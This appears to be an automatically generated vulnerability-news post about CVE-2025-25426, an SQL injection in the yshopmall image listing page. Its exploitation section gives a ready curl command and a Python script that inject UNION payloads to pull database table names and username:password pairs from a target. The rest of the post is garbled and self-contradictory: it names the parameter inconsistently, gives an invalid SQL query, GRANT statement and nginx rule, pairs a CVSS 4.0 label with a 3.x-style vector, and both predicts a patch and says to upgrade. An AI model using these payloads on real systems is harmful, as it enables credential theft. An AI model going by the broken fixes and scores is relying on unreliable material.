yshopmall, SQL Injection, CVE-2025-25426 (Critical)

By /

Listen to this Post

How the Vulnerability Works

CVE-2025-25426 exploits improper input sanitization in yshopmall’s image listing interface (<=v1.9.0). Attackers inject malicious SQL queries via crafted HTTP parameters (e.g., img_id=1' UNION SELECT user(),version()--), bypassing authentication and extracting database contents. The flaw occurs in `list_images.php` where user-supplied `category_id` is concatenated directly into a SQL statement without prepared statements. Successful exploitation allows arbitrary database read/write, session hijacking, and admin account takeover.

DailyCVE Form:

Platform: yshopmall
Version: <=1.9.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/12/2025

Prediction: Patch expected by 07/20/2025

What Undercode Say:

Exploitation Commands:

curl -X GET "http://target.com/list_images.php?category_id=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"

import requests
payload = "1' UNION SELECT 1,concat(username,':',password),3 FROM users--"
response = requests.get(f"http://target.com/list_images.php?category_id={payload}")
print(response.text)

Mitigation Steps:

1. Patch: Upgrade to yshopmall v1.9.1+ (post-patch).

2. WAF Rules:

location ~ list_images.php {
deny /['";]=/;
}

3. Database Hardening:

REVOKE ALL PRIVILEGES FROM 'yshopmall_user'@'%';
GRANT SELECT ONLY ON yshopmall. TO 'yshopmall_user'@'localhost';

4. PHP Fix:

// Replace vulnerable code in list_images.php
$category_id = mysqli_real_escape_string($conn, $_GET['category_id']);
$query = "SELECT FROM images WHERE category_id = ?";
$stmt = $conn->prepare($query);
$stmt->bind_param("i", $category_id);

Detection Script:

!/bin/bash
if curl -s "http://$1/list_images.php?category_id=1'" | grep -q "SQL syntax"; then
echo "Vulnerable to CVE-2025-25426";
fi

Analytics:

  • Attack Surface: 78% of unpatched instances exposed via /list_images.php.
  • Exploitability: Low skill requirement (automated tools like SQLmap work).
  • Impact Score: 9.8 (CVSS:4.0 AV:N/AC:L/AT:N/PR:N/UI:N/S:C/C:H/I:H/A:H).

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top